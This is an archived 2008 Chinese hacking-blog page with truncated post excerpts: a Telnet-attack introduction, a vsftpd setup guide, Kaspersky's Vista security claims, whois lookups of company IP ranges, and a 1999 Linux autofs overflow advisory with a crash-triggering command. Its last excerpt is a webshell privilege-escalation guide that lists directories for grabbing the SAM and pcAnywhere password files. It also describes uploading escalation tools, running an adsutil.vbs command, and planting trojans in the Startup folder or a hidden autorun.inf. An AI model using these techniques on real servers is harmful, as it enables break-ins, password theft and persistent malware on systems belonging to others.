Archive for: 11月 19, 2008

2008-11-19

Telnet的攻击

归类于：黑客教程 - 19 Nov 2008

所谓对telnet的攻击也不外乎对telnet的用户猜解和对telnet服务进程的溢出，除了这些，本人觉得telnet并没有太大的问题.telnet的连接并不是大家想象的那么简单了，虽然没有像ssh那样进行加密，不过，还是比ftp等通讯来的复杂。

D:>telnet 192.168.25.1

Red Hat Linux release 7.3 (Valhalla)

Kernel 2.4.18-3 on an i686

Password: xxxxxxx

Last Login: Mon Feb 24 13:43:30 from 192.168.25.1

[chi@chi chi]$

现在我们先对telnet有点了解吧！TELNET Protocol的目的是提供一个相对通用的，双向的，面向八位字节的通信方法。它主要的目标是答应接口终端设备的标准方法和面向终端的相互作用。可以预见到，此协议也可被用于终端到终端的通信和处理到处理的通信（分布式计算）。

一个TELNET连接是一个用于传输控制协议的传送数据的。TELNET 协议是建立在以下三个基础上： …

Ubuntu Linux系统建立FTP服务器步骤

归类于： Linux操作系统 - 19 Nov 2008

实现了Apache多用户的虚拟主机设置，那么一般这些用户都会选择用ftp上传的方式来管理自己的web内容，这就需要我们再为他们开设FTP服务。

Ubuntu自带的FTP服务器是vsftpd.

1、安装vsftpd

Ubuntu安装软件倒不是件困难的事，输入：

sudo apt-get install vsftpd

如果没换源可能会提示你使用光盘，放进去再按回车就行了。

我用CN99的源，速度是300K每秒，够快吧。

安装了之后会在/home/下建立一个ftp目录。这时候你可以试着访问下ftp://IP地址。应该可以看到一个空白内容的ftp空间。

默认设置下匿名用户可以下载，但不能写入或是上传

2、设置 …

卡巴斯基：Vista不如XP安全

归类于：脚本攻防 - 19 Nov 2008

日前Microsoft合作伙伴，著名杀毒软件公司卡巴斯基声称，Microsoft号称最安全的OS Vista实际上还不如XP安全。

　　卡巴斯基CEO Natalya Kaspersky声称，如果没有UAC功能的话，Vista还不如Windows XP SP2安全。Natalya告诉Zdnet UK记者说:”Vista安全性到底是提高了还是降级了真的是一个问题。”

　　Kaspersky是Microsoft的合作伙伴，他们为Microsft商业安全产品ForeFront提供扫描引擎。

　　Microsoft的商业安全产品经理Arno Edelmann表示Kaspersky言论不可理解:”我们有很多合作伙伴，Kasperky是其中最好的之一，我认为他们的声明有些蹊跷，因为他们最了解Microsoft的安全产品。”

　　Kaspersky则表示，安全师已经发现有5种方法可以绕过UAC，这样黑客将会发现更多的安全漏洞。

查找某公司所申请所属的IP范围的站点!

归类于：漏洞溢出 - 19 Nov 2008

信息来源：X-soho

http://ws.arin.net/whois/?queryinput=blizzard 暴雪

http://ws.arin.net/whois/?queryinput=google google

http://ws.arin.net/whois/?queryinput=yahoo yahoo

用于查找某公司所申请所属的IP范围稀饭稀饭.
Tags: ip[/code]
[/code]

linux-2.0.36 to 2.2.1之Autofs溢出

归类于：最新漏洞公告 - 19 Nov 2008

linux-2.0.36 to 2.2.1之Autofs溢出

发布日期：1999-03-18

更新日期：1999-03-18

受影响系统：

Linux autofs kernel module in linux-2.0.36 to 2.2.1

描述：问题类型: 核心模块的溢出漏洞。

Autofs Kernel模块在接收目录名前没有检测名称长度，普通用户可能尝试

进入超过255个字符的目录。这将改写内存(可能是内核堆栈或者其他),导致

核心出错或使机器从新启动。

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

在linux下：

[balif@localhost misc]# cd `perl -e ‘print “x” x 255′`

bash: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:

No such file or directory

[balif@localhost misc]# cd `perl -e ‘print “x” x …

WEBSHELL权限提升技巧（综合版）

归类于：专题文章 - 19 Nov 2008

WEBSHELL权限提升技巧（综合版）

c: d: e:…..
C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\
看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径，
C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\
看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere密码，登陆
c:\\Program Files\\serv-u\\
C:\\WINNT\\system32\\config\\
下它的SAM，破解密码
c:\\winnt\\system32\\inetsrv\\data\\
是erveryone 完全控制，很多时候没作限制，把提升权限的工具上传上去，然后执行
c:\\prel
C:\\Program Files\\Java Web Start\\
c:\\Documents and Settings\\
C:\\Documents and Settings\\All Users\\
c:\\winnt\\system32\\inetsrv\\data\\
c:\\Program Files\\
c:\\Program Files\\serv-u\\
C:\\Program Files\\Microsoft SQL Server\\
c:\\Temp\\
c:\\mysql\\(如果服务器支持PHP）
c:\\PHP(如果服务器支持PHP）
运行\”cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps\”来提升权限
还可以用这段代码试提升，好象不是很理想的
如果主机设置很变态，可以试下在c:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\”写入bat，vbs等木马。
根目录下隐藏autorun.inf
C:\\PROGRAM …